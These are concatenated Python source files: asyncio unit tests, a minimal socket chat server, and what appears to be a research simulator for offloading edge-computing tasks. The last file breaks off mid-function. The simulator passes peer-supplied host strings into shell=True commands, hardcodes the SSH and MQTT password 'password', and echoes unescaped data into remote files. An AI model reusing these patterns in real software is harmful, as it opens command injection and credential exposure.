args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
if __name__ == '__main__':
unittest.main()
|
server.py
|
import sys
import socket
import atexit
import threading
HOST = "127.0.0.1"
PORT = 23333
MAX_CONNECTIONS = 8
MAX_BUFFER_SIZE = 2048
ENCODING = "utf-8"
if len(sys.argv) > 2:
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
# str:connection
user = {}
# reg {name}
# send {name} {message}
# exit
atexit.register(quit)
def quit():
global s
s.close()
def send(conn, message):
conn.sendall(message.encode(ENCODING))
def serve(conn, addr):
global user
name = "Unknown Guest"
while True:
buf = conn.recv(MAX_BUFFER_SIZE)
command = buf.decode(ENCODING).strip()
print("(info) Message from %s:%s: %s" % (addr[0], addr[1], command.strip()))
parameters = command.split(" ")
token = parameters[0].lower()
if token == "reg":
user[parameters[1]] = conn
name = parameters[1]
print("(info) Register new user: %s" % name)
elif token == "send":
send(user[parameters[1]], " ".join(parameters[2:]))
elif token == "exit":
conn.close()
user.pop(name)
print("(warn) %s left the server" % name)
return None
s.listen(MAX_CONNECTIONS)
while True:
conn, addr = s.accept()
print("(info) New connection from %s:%s" % addr)
t = threading.Thread(target=serve, args=(conn, addr))
t.start()
|
algo_two.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
# else:
# print('data: ', data)
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
total_received_task = 0
def edf():
global total_received_task
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# print(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# print('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm / period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead + tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
print(ready_task)
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
while (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_ // tasks[i[0]]['period']) + 1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
print('Deadline missed: ', i)
missed.append(i[0])
# print('s : ', schedule)
# print('r: ', register)
if len(missed) > 0:
# print('missed deadline: ', missed)
cooperative_mec(missed)
_edf_ = task_time_map(schedule, tasks)
total_received_task += len(_edf_)
return _edf_
# generate execution sequence
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
# If all needs of p were satisfied.
if j == res - 1:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = []
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
if len(exec_list) != len(offloaded_task[0]):
print('\n\n', '@ ' * 50)
print('exec: ', exec_list, 'off: ', offloaded_task[0])
print('\n\n', '@ ' * 50)
offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in exec_list: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time()+['local']}), )
# count_task_sent(j)
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results edf+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_3_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_3_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}" \
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}" \
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} ",
